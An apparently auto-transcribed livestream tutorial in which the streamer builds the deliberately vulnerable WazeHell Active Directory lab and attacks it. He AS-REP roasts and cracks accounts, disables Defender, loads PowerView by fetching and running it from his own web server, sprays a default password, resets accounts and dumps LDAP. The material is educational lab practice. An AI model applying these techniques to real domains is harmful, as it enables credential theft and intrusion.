be looking at WazeHell, which is a vulnerable Active Directory network. And we're going to be putting this on, installing it and everything down on Windows machine. So right now I already have Server 2022 started. Nothing else. Did not make it Active Directory, didn't make it anything. Or did not make it domain controller, nothing like that, right? So we can go to this GitHub.com WazeHell vulnerable AD page like right here, right? And we can go ahead and scroll down and we will see that we can do this filing like right here. Okay. And we'll just go to Control C. Let's go ahead and right click. More. Run as administrator. Let me make this bigger for everybody. Now let's go to reset a couple times. But we can work with that. So let's go ahead and copy that into there. Now if you want to change the domain name, right? Go ahead right here. It says domain name. And right here obviously. Okay, so we can click home, go over there, and we'll change the domain name to invoke.local. And domain NetBIOS name to invoke. Before I do anything else, I'm actually going to make sure my network is correct. All right, now we're on the correct network. We'll go ahead and wait for it to actually connect to that network now. There we go. Yes. And we go ahead and hit enter. And this will start to install that WazeHell Active Directory. Like I said, this might reset a couple times, but that's what it's made to do. That's on purpose. This is what we're going to start showing for a lot of our attacks. So this WazeHell Active Directory, this can be found on GitHub at WazeHell vulnerable AD, vulnerable attack AD. Okay, you can do a bunch of users. All right, default it's 100, I think. I think we're probably just going to pick like 20 users, probably not 100. Let's go ahead and set a password. There we go. And we'll just let this guy install. What's up, Full Stack Live? We are installing an Active Directory network utilizing PowerShell from the WazeHell vulnerable AD GitHub repo. So, a content warning for streams that display Windows stuff. Do you want me to start putting warnings in my stream that Windows may be on this? Usually whenever you click on my stream, it usually is Windows stuff. Like I said, the computer will restart a few times, so go ahead, we'll say okay. Oh, this is a very exciting stream like right now, I understand that. The preparation for it is always the most exciting things. Actually, once we install this, we're going to change a couple things. We're going to allow users to remote desktop. We're going to allow users to have a remote management, things like that. Use of Windows. Here, I'll go ahead. You know what? just because you said that, I'm going to go ahead and I'm going to update the stream right now. Like for any next certification? I don't know, Strong Shiv. What do you suggest to be next? Warning. Involves Windows machines. You should suggest certified red team operator. I was actually thinking the hack the box one. That's what I was thinking about next. But you're saying certified red team operator. How much does that one cost? I know these are all easily Googleable questions, and I always say Google the shit. I understand that. Oh, B7H30 is also on. Stream might become a. Let me see what he's doing like right now. It might become a co-stream. He's doing something. Let me go ahead and listen to him like real quick while I'm also clicking back and forth. All right, we're back over here. So thought of that. Okay. You're using a VM. Yeah. We got a couple VMs up and running. We have Kali and server 2022 up. All right. I'm gonna mute him out for like right now. Okay. Yeah, we got a couple VMs up and running like right now. I'm just trying to get some music now for myself. Sorry. I didn't really set up for this. I'm pretty bad at this. I don't actually know what the hell I'm doing. I just click on stuff till it works. Seems to be working so far. People seem to like that so far. I don't know. Okay. So now we're here. Let's go ahead and go back to that web page, right? Should just open it like right up, I would think. Nope, why would it? Yep, WazeHell AD. Let's go back over here. And we can go ahead and we will now run the rest of our command in here. Now we could download this if we want to, right? Put it in our system and run it. But literally the next command is to download that like right there. And then remember to change domain. If you changed domain name before, remember to change it again. So we'll do PowerShell, right click, run as administrator. Hey, Dan Yelo, you just gave me the Discord server. Thank you. I know that you're probably, if you ever watch this video, thanks a lot. You just landed, it said. So we had ours as invoke.local, right? Let's do let's do 30 users. Okay, we'll do 30. All right. So we got quite a few users here now, right? So let's make sure that we have some that are, yep, okay. Now what we have to do, now we have that, they've made the user and everything like that. We're now a domain controller. We're ready to go. Okay. But we're going to do a couple more things. Okay. Let's go ahead and we need the username list, right? Because there's no actual way to get a username list off this thing. So there's that user, or I guess what we could do, we could always make it SMB. Let's go ahead and do I mean, not really realistically, because if you had this as your SMB share, you're an asshole. But, so it actually doesn't put them all into users on here. Okay. But let's go ahead and grab all these people, right? And that's going to be our username list. So we'll do a Control C, and let's head back over into our Kali machine, and we'll make that username list, right? So now I'm going to go ahead and we're going to kind of bring this over. This is going to take me a second. Sorry, because I'm an asshole at this stuff. Let's see here. transform, fits the screen. But we want to do a, oh man, I suck at this part of it. There's Cali, right? But we want Cali to be, oh, I know what I can do. We can just go ahead and just do this, can't we? Boop. And then we can go ahead and do this. Boop. That looks like ass. There it goes. So like a boop. Those boops, you do have to do those boops if you're doing this also. That is part of it. Let's go ahead and we'll move Cali over. And there we go. Now you guys are complete opposite of what I see, so that's not going to be confusing for me at all. All right, now we can go ahead and hop onto Cali, and we're going to drop that username list over into here, right? So let's go ahead and we will cd in desktop, make directory WazeHell. Do I already have WazeHell? Never mind, we're going to cd into WazeHell. Use primary higher than corporate AD. All right, let's go ahead and remove tag RF. Star, we'll just remove everything, right? Yes. Oh man, we got a subscriber on YouTube. Thank you very much. All right, now that we removed all that, let's go ahead and echo that into users.txt. What we're going to do is we're also going to go ahead and sublime that users.txt and actually make it correct, right? So it's a little bit easier. We just enter, and then do the same exact thing, enter, and make sure there's no space in there, which there's a lot of spaces in there, right? So we can go ahead and use that sed command, right? Let's go ahead and save this like real quick. Control S. We can use that sed command, which I always forget it, and I was kind of hoping it was just going to stay up, but of course it didn't. Remove spaces. Look at that. This is how often I've looked at it. So we'll go ahead and we'll cat users.txt, and we'll go ahead and we'll pipe that in that sed command, and we'll output that into usernames.txt. Cat usernames.txt, and there we go. Now we can move tech RF that users.txt file, and there we are. All right, so the very first thing we're going to look at, okay, is going to be the one thing I don't like about this is that we actually can't look at users over here, so I can't show it to you over here. That's the one thing I don't like about this tool, like right there, is we can't show users on this tool. Maybe we'll actually just make our own. It's already Active Directory domain, so we're good on that. We're going to install no new tools. Say cancel. We can't actually look at the users. That's one thing I don't like. All right. So if a user has Kerberos pre-authentication not required, that's going to be the first thing that we are going to look at. That means that you can, as you all know, as rep that user, right? Now, first thing I want to do, though, is make sure, are these people real, right? And real life, we want to make sure, are these people real, right? We obviously know they are. We got them off the domain controller. But let's go ahead and do a Kerberos. First, we got to actually see what the domain name is. Excuse me. Let's go and do a craft map exec, SMB. I just don't even, first, we have to know what the hell the IP address is, right? So let's check our IP address. Okay, there it is. So we know we're in a /24 network because 255.255.255.0. If anyone doesn't know that, hit me up and we could have a stream on subnetting. So from here, what we could do is that mmap tech sn, or we could just check it out over there, you know. We're going to say 0.0/24, and hopefully this machine actually has ping on, or else that mmap tech sn won't work. And it doesn't look like it actually does now, does it? Does not look like it actually has pings on, unless it's 70 is it. Let's go ahead and check. Which, if you're a domain controller, you have pings on. So, that's a little bit not realistic. As soon as you actually put on that, you'll be able to do a ping. Let's go ahead and do a rust scan on 73. Yep, definitely a domain controller. We got port 88, things like that in there, right? Okay, so we got all of our ports over here and everything. Whoopsie daisy, there we go. We got all of our ports over here and everything's looking pretty good, right? So let's go ahead now, and we know it's a domain controller. Let's do our curb root, right? Excuse me, we need our crap map exec SMB on that 192.168.0.73 IP address there. TAC U, put a bunch of crap in there. TAC P, put a bunch of crap in there. What is that? I did just do a sudo apt auto remove too. So I'm wondering if that is, obviously has something to do with it. That's crazy. Did that really remove PyWareView? We'll reinstall it. That did auto remove. And actually, oh man, what is that, huh? Okay, that's okay. You want to know why? CD back to there. CD into .cme. Because I only have version 5 on here. Ooh, but is that going to work also? Because I already installed it. Ooh. We may be doing another how to install crap map exec. Or maybe I did actually put in a crap map exec. Never mind. Crap map exec. Okay. pip3 install period. Hopefully this will fix it like right here. You will not have this problem if you are running on version 5. This is version 6. It is not part of the repositories yet for Linux, for Kali. I should say for Linux, but for Kali is not part of the repositories yet. All right, now let's try it again. There we go. Okay, cool. So we know the domain name now is invoke.local. Okay. Now let's go ahead and let's try to do a little magic here, right? WazeHell. There we go. Okay. We got our usernames.txt file. Let's go ahead and do a curb root. All right. And we're going to do that for that IP address of 73, right? Domain of invoke.local, and that's just threads. So what we have here now is we're going to use curb root, user enum, usernames.txt, domain controller's IP address, right? Invoke.local, tac t200 for 200 threads. And there we go. We find a user that has pre-auth not required. So that Kerberos pre-authentication not required, we find a user with that. However, this user, this is a dot or a $18, so that's not going to be too useful to us with cracking it. So we're going to go ahead and we're going to echo that user into, we'll just say asrep.txt, and we'll go ahead and we'll run get np users, and we're going to run this for invoke.local, right? I always forget what the, okay. Invoke.local, okay, tac no pass, because we don't care about the password. Tac user's file is going to be asrep.txt. And since I never put that into my Etsy host, it's not going to be able to know where the hell to go, right? That makes sense, right? Try again, and there we go. Now we can do a tac format, and then do hashcat. Okay, there we go. All All right, and then from here, we could technically say, I think it's out file, I think with it. GitHub user.py, I believe it's out file. Tag format, tag output file, there it is. So we'll say tag output file, and that's going to be hash.text. There we go. Okay, so now cat hash.text, and there we are, right? As you see, it does get rid of this in packet up here. So now for an asrep roast, okay, with hashcat, we can utilize I think it's 13,200. Is that it? So we can look it up. We can look up a on the hashcat. Sorry, I saw something. We can look up something like this, right? We can look at hashcat examples, the wiki page for that. Or I think it's actually 18,200. That's 7,500, not that one. 13,100, 18,200. I believe it's this one right here. Okay, 18,200. So we can do a hashcat techm. Yep, 18,200. That's going to be for hash.text, and we'll utilize rocky.text word list. And we get the password pretty much immediately, okay? Now, if we're going to use John, we can use John, hash.text, and we should actually be able to do the same exact thing. There you go. Okay, so if you put in the hashcat format, you can still do it with John the Ripper, and we get the password. Now, let's go ahead and let's start to script that out, right? So, let's start up a Sublime, and we will say, I don't know, ad.py. Okay, and I have a lot of Python scripts, so I'm just going to go ahead and just grab one of the other ones that I already have, and just kind of start copying some stuff over. Let me go ahead and delete a whole bunch of stuff in here, right? There we go. We'll do something like this, like right here. And we can grab that whole thing for the argument parse, so I don't have to type it all out again, right? That's kind of pointless. And we got a lot of stuff going on here, don't we? As you can see, I didn't really... There we go. Now, obviously, we want to change the description. I'm actually going to full screen this now. Let's go ahead and change the description to AD. Okay, or something like that. All right. And right now, we don't care about hashes, right? We really technically don't even care about users file like right now. But we'll leave it in there. No, we do. We do. We care about it enough. Okay, we can keep this aircrack in there also. And what we're doing is you're going to import OS, import arg parse, time, all this good stuff, okay? And what we're going to try to use is I'm going to try to use subprocess because I don't really ever use subprocess. So I'll think about using subprocess now because OS system, I've been told that's not the way to do it. However, I think that subprocess open, popen, I think that's just as dangerous if you use it with shell equals true. But I don't like putting commas with everything. So I think I'm going to use subprocess popen. And yeah, we're just going to go for it. But I believe I need to import that, don't I? I believe I need to import subprocess. I think that's a thing. All right. And let's go ahead and change these guys into arguments over here. So we'll say our host equals our host, something like that, right? Let's go ahead and look at my other guy because I think args.our host, that's why. Args.our host, okay. We can actually probably just grab all this over here so we're not sitting here and retyping out everything. Don't care about hashes yet. We can keep that auto in there. So there we go. So domain's going to equal args.domain. Username's going to be args.username. We're just going to keep going down it, right? So now from here, now we have all this. Let's go ahead and let's define something. We will define asrep like that, right? Boom. Okay. So we're going to say asrep, right? So we are going to first make sure that there's a domain name. Okay, that's the very first thing we want to check, right? And that there's a user file. So we can do that at the very bottom of this one, right? We can say if user file, or if file, because as you see, I changed file args.user file. If file is not none, then it's going to run as rep. Okay, there we go. So if a user file is not none, we're going to run as rep, right? And we're going to utilize impact, right, for this, right? So we're just going to say impact equals, and we're going to put in a whole thing in here, right? We're going to say, let's see here, because all the impact scripts pretty much, if I were to go and get MP users, they all pretty much run like this, where it's domain, user, password, right? Even though we're not going to be using that yet, but we want to put it in here just in case. So we're just going to say, put an F in front of that, domain. Let's see which way the slash goes, because I always forget. Yep, slash username. I'll mess this up bad, huh? Password, there we go. All right, so we have that, okay, and that'll be for later on. And then from here, we're going to do a sub-process. I'm thinking we do like a p open, and then there is a shell equals true, which this is just as bad, I guess, but I'm going to go for it. Okay, so we're going to do a sub-process dot p open. I believe it goes like that because I have not really used this very much. All right. But sub-process supposedly waits for the command to finish before it actually does something. So we're going to put in the command, right? We're just going to say get pretty much something like this, right? Put an F in front of that. All right, now obviously invoke.local most likely is not going to be the domain name, right? So we want to delete that like right there. And we're going to say invoke or domain. No pass users file is what is the users file, right? So we'll say file tech format hashcat, right? Boom. Okay. So we're going to say that. We'll say as rep. We'll call this without user, which means we can take this like right here because we're going to be using this command a lot. We'll press Control X on that, Control V that up here, just so it's for every single person that we have that, right? Or for later on or whatever else. Okay, so now we have all that. Format hashcat output equals hash.text, right? Output is going to be that. And then from here, we'll say something like, we'll say define crack. We'll define crack pass without user pass. There we go. We'll do some of that. WOUP. All right, define crack pass. And we're just going to say if auto crack equals true, right? Or is not false, we might have to put that in. We're going to do crack pass, right? That crack pass, what we could do with that, we go ahead and take this. Actually, may actually want to go even further into this one, like right here, but we'll do that later on. That crack pass, right? We want to go ahead and we're going to do our hashcat, something like that. But first, we want to check is we want to see if hash.text actually exists, right? So we want to see if a file exists. So we can look up see if file exists in Python. So we want to make sure that hash.text file exists, right? So let's go ahead and look at a little thing that they got here. So they're saying if OS file is path in the path. So we got to give it the path first, right? So we're going to say path equals hash.text. And then we'll go ahead and we'll do a if path is file, like right there, right? So OS path is file path. So if that equals true or is not false, right? then it's going to continue. Okay, if there's no hash.text, then it's not going to do anything, right? I'm going to say with open hash.text, read it as f. All right, we're going to say from here, we're just going to say a quick hashcat or whatever. Or actually, we don't even do that, huh? We can just do the hashcat now, huh? Because if that's there, then we say subprocess.popen, and we'll go ahead and we'll give it a quick, let's see here, the hashcat command, right, that we had earlier. And we'll try with rocky.txt. All right, so that should be everything. Like I said, I've never really used subprocess, so I don't know if I actually did any of that correctly. That all may be wrong. I have no idea. Okay, so define crack pass, and then if auto crack is true, if file is not none. All right, let's go ahead and try that, like right there. Let's see how many errors we get when we very first try this. So we'll do a Python ad.py. So far, so good, right? We definitely need to give it R host also, right? So we probably should define R host and things like that also, right? No, we actually don't. Now, do we? Yeah. Users file, we need to put R host in here. We actually don't, because we have the domain like right there. So we technically don't need the R host like right now. So we should just actually just say the domain is invoke.local. Remember, I did put the domain into my Etsy host, right? Domain is invoke.local. And we want to do an auto crack, right? Capital E. And our users file is going to be users.txt, right? Whatever that is, right? Usernames.txt. Okay, we get a couple problems here. No such file, get IP users. Boom, boom, boom. All right, no such file. Line 50 in module. As rep WOUP. Maybe it's actually trying to open that. Oh. Shell equals true. I think it's like that. That's why. Okay, we'll get a little bit further now. Name autocrack's not defined. Is that right there? Autocrack? Oh, if auto, that's why. It's right here. Okay. So now say domain should be specified, but we are specified domain in there. Let's go ahead and do that like right there. Okay, let's see here. No such file directory. So we want to do shell again, obviously. There we go. Now again, domain should be specified. So it looks like it's not taking it properly. The cyberlogist, hey, thanks a lot for the follow. So it looks like it's not taking it properly, huh? Actually says all hashes filed as pop file, but we already have that hash in there. So we actually technically want to remove tag rf as rep.txt and remove tag rf. Oh, wait, you want to know why? Did I say users? No, I said usernames. We just want to remove that as rep.txt. Or that hash.txt, actually. Okay, so we can't see the domain for some reason like right now, even though we are putting it in domain like right there. You want to know why? No slash behind it, that's why. So it doesn't know that's domain, huh? There we go. So now, is that a different person also? Is Betty a different person? No, okay. I'll say, is that a different person over there? All right, cool. So now we know that does exist, right? However, we just say auto, and we're not really giving it, like, this isn't really helping out very much now, is it? It's got to be users. because if we cat that hash.text like right now, oh, actually it did just drop hers, and that's it. So now this one, like right here, this auto, this crack pass not working for us, right? Because we try to do that like right there. And we said if auto equals true. So I guess we do it is not none. Or is not false, maybe. Let's try that like right there. I feel like that says I think it's equals true. Let's remove that hash.text. Let's go ahead and run that again. Okay, I think I'm supposed to do a wait afterwards, aren't I? Something like that. There we go. That wait did it. Wow, that came through fast, huh? Well, we already had that hash.text. Let's remove that hash.text like real quick. Let's try this one more time. There we go. Wow, that actually went really fast. That was actually kind of insane how fast that went. Awesome. So now we have a script that we can run, right, that we can use for other machines that allows us to utilize GetMP users without using their password. And it's going to run this like right here as long as we have a user's file. Right, so now that works, awesome. So let's continue going on now, right? So let's go ahead and take that user. Let's hop back over to our Windows machine over here, right? And let's go ahead and make that user I don't know, let's actually grab another user and we'll reset their password. I can't. Oh, yes, I mean, I can, but I can't. Okay, let's go ahead and take our Dean Roseanne, okay? And we are going to say net user, our Dean Roseanne, and we're just going to make her password like that. We're just going to say that, okay? Then we're going to say net local group, our Dean Roseanne, or net local group, remote desktop users, her, /add. Okay, and then we'll do a remote management users for her. I have no idea who this user is. I don't know what type of privileges she has. Let's go and hop back over into here, and let's try to do a even-when-rm. Let's see what that does. See if we can actually get on. Okay, we can. Hopefully she's not some like crazy administrator. She's an office admin, but it doesn't really seem like she is. She's marketing, accounting, and office admin. Okay. So let's go ahead now and do the same exact thing we just did, except for this time, let's use Rubius. All right, so let's go ahead and make directory ctemp, cd into ctemp. So if you're already on a machine, you could do this also. Let's cd into my tools. There's Rubius. Grab my IP address. Okay, and we will do a wget. /that. Tac O, we'll save it as that. And let's go ahead and start up a Python 3 web server. And let's try to put this on there. Okay, so Rubius is now on there, right? Now, one thing, I don't think they ever shut off the, let's go ahead and open this up, even though Ruby still hasn't been caught yet. But let's go ahead and make sure that we don't have any network protections on for like right now. So this is more of just a class. Let's turn off all that. Turn off that guy. There we go. All right, awesome. There we go. Okay, everything's shut off now. Let's go ahead and hop back over to here. And let's go ahead and load up Rubius. And with Rubius, we can also asrep roast. All right. What we can do, one second. Okay, sorry, kids are talking. All right, what we could do is we could say Rubius.exe. There we go. Asrep roast. Oh, roast. And there we go. All right, so we've now found this through the Windows machine inside there, right? So we've now done it from Windows to here. Okay, and we also obviously don't need a user's file because we're already on the machine itself. So we could look up a user file, right? We could do the same exact thing without putting that to hashcat and everything else. So we could say that /format hashcat, all right, and then we could do our out file, all right. So we say /out file hash.txt, and there we go. Now if we type hash.txt, there we are, right? And now if we want to crack that, we can crack that with hashcat, right? Hashcat.exe. We can download it to this machine and actually crack it like that, or we can bring it back to ourselves. So if I go to desktop, and this is WazeHell, right? And we'll remove techrf.hash.txt, and we'll go ahead and we will bring this back to ourselves. So we can say copy, start up an SMB server, and we will copy from to 192.168, copy hash.txt to 192.168.0.24, I believe it is, /share. Okay. And we have it back over here again. And we can go ahead and do a hashcat again for that hash.txt, right? And there we go. Okay, so now that's another way to be able to do it, like right there for asrep roasting. We can also find pre-authenticate not required within Powerview. So let's go ahead and cd back into our tools directory. Start up our web server again. There we go. Okay. Let's go ahead and go back to here. We're not going to do a wget this time. Actually, we're actually going to do an IEX, IWR, use basic parsing. Our IP address here. Powerview. Okay. And we can go ahead and grab that. And from here, my daughter's like crawling across the floor and trying to like grab her water, trying to make like no noise or whatever. I look over to the left, she's on the floor staring at me, trying to grab her water. I'm just laughing. It's the weekend; they can stay up later. I'm just laughing, like, "What are you doing over there?" You know? Okay. So now we did this. We should be able to do a getnet user tech from pre-auth not required. I think it is. Yep, we can. Okay, so we can see that Betty Carroll is a user with pre-auth not required. So this is another way that we can actually look at it and figure it out, right? So now we figured out 3 different ways that we could do this. So we could also throw a verbose in there if we want to. All right, but now it's 3 different ways that we could do this and figure out that user. Can we use upload? We can. If we're in Evil WinRM, yes, we can. All right, so we could have also done, let me go ahead and do this. Now we know that we're in WazeHell, right? Yes, 100%. We can go ahead and remove techrf hash.txt. And we could have done a download hash.txt, download hash.txt. So we're downloading from the machine. And then ls-la, and there we go, hash.txt. So 100% yes, we could have also uploaded or downloaded things like that. We could have also uploaded we could did upload for Rubius. So let's go ahead and delete Rubius. All right, and what we could have done actually is an upload. Now, one problem with upload is it wants to upload from WazeHell, But if you do a whole bunch of period slashes, it gets to go back, right? Tools / Rubius, right? Oh, it's because it could be home, Cali, tools, Rubius, and then it'll do that. So if you're going to upload from a different directory than what you're in currently, you have to almost do like an LFI kind of thing. You know, so you have to bring it back forward again. All right, just so you guys know, okay? So, and now we deleted Rubius, now Rubius is back. So yes, we could have also done it that way too. That I think should be about it. Does get ASRep hash to work on this thing? Okay, get ASRep hash to not work. I think that's in ASRep roast.ps1. I believe that's another way you can do it, which I don't know if I actually have that on here. I do. Okay, here's a PowerShell script also for ASRep roasting. Okay, so we can also do this like right here. IEX, IWR, use basic parsing. 192.168.0.24/that. Let's go ahead and start up our web server again. All right, now we can do now from here, we could technically do a get ASRep hash. I think, can I just do that like right there and run it? Or do I actually need the username and password? I think I need a username. So we would get the username obviously from over here, right? All right, so we can do a get ASRep hash, tac, I believe it's username, and then tac username, verbose, and there we go. So there's our hash right there also. So there's another way to be able to do everything with ASRep. Okay, so if we're on Windows, we can do it. If we are on the actual machine itself, we can do it. If we're on Linux, calling into the machine, we can do it. And obviously, if we're on the machine itself, we don't need that username file, right? Awesome. There is ASRep roasting a bunch of different ways, plus setting up. Oh man, oh, that's ugly for you guys, isn't it? That looks super ugly for you guys. I'm sorry. 1 second. I guess it's not too ugly. Are they freeze? I'm seeing something way different than you guys are. Did that thing freeze on you guys? No. Okay, just my phone froze. That's all. All right, cool. Let's say I was seeing something way different. Yeah. What do you guys see like right now? How about that? Because if you guys aren't seeing what I see, that is not exciting at all. Because it seems like it may have frozen. Huh. I have to redo this whole thing, huh? Windows machine, first half of... Yeah, but is this still the same remote management users for you? Yeah, it just says... Damn, man. You guys haven't... Okay. Never mind. Yeah, with the evil winner and everything. Oh, that's boring. 1 second. Yeah, we're good. Okay. I was like, oh my god, you guys don't see anything. All right. But what I should have done is something like this, huh? You guys should have told me. All right. Thank God. I thought you guys just saw. I thought it was frozen like right there. I was like, oh my God. You guys not see any of that? All right, cool. So now that we have a few different ways to do ASRep roasting, there we go. I don't know if you guys knew about the Windows ways or anything like that. If you did, tell me shut the hell up. So welcome to the second video for the WazeHell Active Directory install thing. What's up, GoPro Slowyo? How you doing? Just saw you over in Theo's chat, but I was about to start streaming, so I had to get out of there, or head out and head over to here. All right, so this is the second video for it, or it might still be one long video. I don't know yet. But the last time I told you guys that we didn't have Active Directory users computer scene here, right? So I figured out how to do it. what we're going to do is we can go ahead and we can head over to manage, add roles and features, next, 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 next. All right, all the way down to features, all right? Scroll down and you're going to get to remote server administration tools. Okay, from there, click on role administration tools. And then here's this ADDS, ADLDS file like right here. You go ahead and start that up. All right, make sure everything's clicked on there. Evening, what's up? Pressure's up. How you doing? So we're going to go ahead and we're going to start all these up like right here. Okay, so that's how you get that working. And then once you do that, you will have to restart the domain controller, and then you should have your Active Directory users and computers. Once I'm finally done with this guy, I'm also just going to take this image and I'm going to throw it onto Vagrant. So if you want to download it from Vagrant, we'll have a link for it and everything like that. But that'll be once I'm done with them. So now, let's go ahead and let's look at what else we can do, right? So last week, or yesterday, yesterday we started with, what was it? ASREP roasting, right? We showed, what, about 5 different ways or something like that? 4 or 5 different ways to do ASREP roasting, right? I don't think I ever saved that user password. No, did I? But actually it's right there. There's the user. So if we can go ahead and we can remove a lot of these. I actually want to take ad.py. That's good. And everything else in user.txt. We want to copy, we're going to go ahead and copy user.txt real quick into LDAP. We're going to remove tacrf star.txt. And then we'll go ahead and we'll copy from LDAP user.txt straight back to here. Right? Oh, it's right here. I just dropped down one more directory. And there we go. So there's our user.txt, right, that we got last time. Okay. And from here, we have our ad.py. Remember, we were working on that last time also. I did do some more with it on my own. So if I go ahead and sublime that ad.py, we put in a bunch of more things. Okay, we got quite a few different crack map exact things going on here. BloodHound going on here. We have impacket, LDAP, domain dump, and other things like that, right? And then a lot more statements down to what to call if something happens, right? And we also added in some more tools up here. All right, like auto crack, you can call for that. Impact and everything, you call for that, and stuff like that, right? And crack map everything. So if you don't want to run any of that stuff, you don't have to, right? Pretty much. Let's go ahead and let's start off with running that ad.py again, grabbing that hash.txt, that user and everything like that, through ASREP roasting, cracking that hash and everything like that, right? So go ahead, we'll python ad.py. All right. Our user list is actually users.txt, right? And we're going to go ahead and say tac e, that's going to auto crack. So if I go with cd desktop, WazeHell, and I python ad.py, all right, that tac e is for auto crack. If avrep hash is found, try to auto crack it with hashcat. All right, we'll go ahead and say okay with that. And that should be it, like right there. Let's go ahead and try that. As you can see, we do find the ASREP roastable user, and we do crack that password. Okay, right here. All right, we got prints. All right. So there's the ASREP password. There's the ASREP roastable user. Okay, we already have it at Etsy host, so we're good with that. All right, and now that's it for now. Okay. We can now go ahead and run that same thing if we want to, just to see more functions of it, like right now. Betty.carol. The R host is 192.168.0.73, right? So we had the other day. The password is going to be print, right? And then we'll say text capital C for crack map exec, right? And it goes ahead, runs a quick mmap scan, looks through, see if it can log into SMB. If it can, it's going to run some more commands. All right, you can see that we just dropped a bunch of stuff in here. All right. From here, it sees if RDP is opened. It is. We pawned RDP. It sees if WinRM is open. We pawned WinRM. So we can get into both of those, right? And then it's going to go ahead and it's going to start dropping more stuff, right, for us. And lastly, we do finally get that domain dump. All right, that's actually for impact, like right there. So I got to change that up so that it only works. It only says that with impact it. But we went ahead and we did a, what was that, BloodHound, Python, and LDAP domain dump. Now this kind of goes on to our next lesson. Okay, we're going to look at that LDAP domain dump, right? So let's go ahead and actually full screen this guy right here. And we'll head over to my desktop. Okay, cool. Streamlabs desktop looks good. All right, we'll full screen this guy. And let's go ahead and see what's going on with that LDAP domain dump. So let's go ahead and cd into LDAP. All right, and there we go. Okay, we have this domain users.html right here. So we can go ahead, we can do a Firefox for domain users.html. And we see a bunch of people in here, right? Now, something that we can also see is we have descriptions. All right, descriptions can be seen. Okay, so if we go into Windows over here, right? Oh, there we go. Okay, if we go into Windows over here, right? And we go ahead and we actually let me go ahead and do it like this, like real quick for you guys, so we can see both of it. There we go. All right, and then we got our Windows also right over here. So if we do that, okay, and we go into a user, so tools, Active Directory user computers. Let's see here. Here's someone with a description, right? So if we double click this person, this is the description that it's talking about, is right here. Now if we full screen this again, and we go down, we can actually see that there's passwords in some of these user files, right? So we have this person right here, they have a password. This person right here, they have a password. And then we also have these new user default password. Okay, the default password on this is change_me123 exclamation point. It says it in the GitHub. So we did obtain some more users and passwords, right? We obtained those things like right there, right? And we can also see what groups they're in. So we know that Sibby Shea is a server operator and a backup operator, and we obtained their password. All right, that is a problem, right? So that kind of leads us on to our next lesson for LDAP domain dump, and also where we're going to go at with BloodHound. Okay, so we see these two. All right, awesome. Let's go ahead and throw those two people into our file, into here. And I also did turn on remote management users and remote desktop users for everyone. I just turned on for everyone instead of picking and choosing and trying to figure it out, some of that. Just everyone I did it for, so they can all get in, right? I should have probably just did it for the groups, but whatever. So let's go ahead and we can echo these different username passwords, right? So we can go ahead and grab that. Oh, actually, I can actually full screen this because it's actually right here. So let's go ahead and grab her username first. That person, right? Into, and then her password, excuse me. And we'll put that into user_pass.txt. And we'll do the same thing with our next user right here, Sibby Shea, right? And I definitely hit, there we go, Sibby Shea. And we'll go ahead and we'll throw her password in there also. Into user_pass.txt. Okay, now that we have those two people in user_pass.txt, let's go ahead and let's also, we can start crack-map executing with them, right? So we do a crack-map exec, SMB, tac U, we'll say Hana Alicia, tac P, this password right here. All right, we go ahead and hit enter there. Oh, let's go ahead and put that in quotes. We'll enter there. Okay, yep, that user 100% can do something, right? Let's go ahead and throw that into, I don't know, WinRM. And she's able to WinRM in. Okay, let's go ahead and throw that into RDP. Okay, she's able to RDP in. Okay, so we can see how this started to work, right? We can try to throw it into LDAP. Okay, she can't use LDAP, all right? That's okay. All right, so same exact thing's going to be seen with Sibby Shea. However, Sibby Shea, we saw, was different operators, right? Which that's going to probably be tomorrow or another day's lesson. Maybe tonight, we'll see. All right, so we saw that she was a backup operator and a server operator and also a DNS admin. She pretty much has all the rights that are really bad for someone to have. We also have these new user default passwords. So let's go ahead and let's run a crack-map exec brute force would change me 123. So we can do a crack map exec, and we'll do SMB for that, right? And we're going to do change me 123 exclamation point. And for our users, we're just going to say users.text. All right, cool. We have this, right? So we have her status password must change, status password must change. Okay, so we have two users where the status password must change, right? Avikina and Lane Morelli. Okay. Now, status password must change. We can utilize Impacket to be able to do that. So let's go ahead and get into our notes here. All right. Change user password. So as we can see, this right here, status password must change. We can actually utilize SMB password. Okay. And then put in a new password for that person. Now we already know what the password is change me123, right? So let's go ahead and do that. And we don't even need any special permissions for this. We can do SMB password, right? .py. We say invoke.local / this user, right? And then it was like this, right? Yep. And we have change me 123 exclamation point at the IP address. Tac, and then we're going to put in a new password, right? New pass. And that new password we can say is PSNSSW0RD exclamation point. So you want to do that. Oh, connection refused. Why is that, I wonder? Invoke.local. Boom, boom, boom. Oh, that's probably because I did 74, not 73. Maybe if I put in the correct IP address, it'll actually work, huh? And there we go. Now, her password is now PSNSSW0RD. We can check that with crack map exec again. SMB, boom, boom. Okay, we're going to do her username. And we're going to put in her password. And there we go. So we know she can log in like that, right? If we were to do, instead of put every single user in WinRM and stuff like that, if we were to do WinRM, boom, there we go. Okay? So we know that every single user can log in like that now. Or that user can log in like that with that new password that we just set just because we knew what the default password was. GoPro. Some people say that, and other people say it's just fine. So I don't know. The mic volume's at 100%. They're like, it can go 0% higher, just to be exact. And I don't really feel like screaming. And the mic is 3 inches away from my mouth. And the only thing they have, because Windows is trash, so if you type in microphone, hey, thanks, Morislav. Thanks a lot. The only thing they have for microphone setup, I love the microphone setup on Windows, because it just talks about voice to speech, and that's it. But yeah, some people say that they can't hear it. Others are like, nah, it sounds good. It's weird. I think it's how far you are away from Okinawa, how far the sound has to travel. All right. So now that we did that, we're able to change these users' passwords, right? We can now do, obviously, more stuff, right, with that user. So if you ever see this status password must change, that's one way you could be able to do it right there. All right, from Linux, right? Let's go ahead and continue on. We did that BloodHound dump, right? Another way to be able to do that BloodHound dump, let's go ahead and remove tacrf.blood, okay? And we'll also show LDAP domain dump since the script ran it, okay? So remove tacrf LDAP. right? We'll start off with LDAP domain dump. One way to do LDAP domain dump. And we're just going to say our IP address that we're attacking, which is 0.73, right? Attack U is going to be invoke.local / and we'll say, we can say her. Sure, why not? Because we know her password now, right? There we go. So if we all attack LA, we now see all this in here, right? We can go ahead and make directory LDAP. We can move domain * into LDAP. There we go, CD and LDAP. And there it all is. Same exact information that we had before. That's how you do an LDAP domain dump. All right, we can also do an LDAP search, or we may be able to do, I don't know. Okay, we'll give it a try for that IP address, right? That 192.168.0.73 IP address there. And we're going to do invoke local. And then I always forget how to put in the username and password for LDAP search. We'll go ahead and check my notes real quick for LDAP search. TAC D, TAC W. Okay. So we say TAC D. And I don't know if this was going to work or not. Sometimes LDAP domain dump works. Sometimes LDAP search works. Sometimes they both work. So it all depends. Okay. As you can see, invalid credentials. Right. We know what those are, the 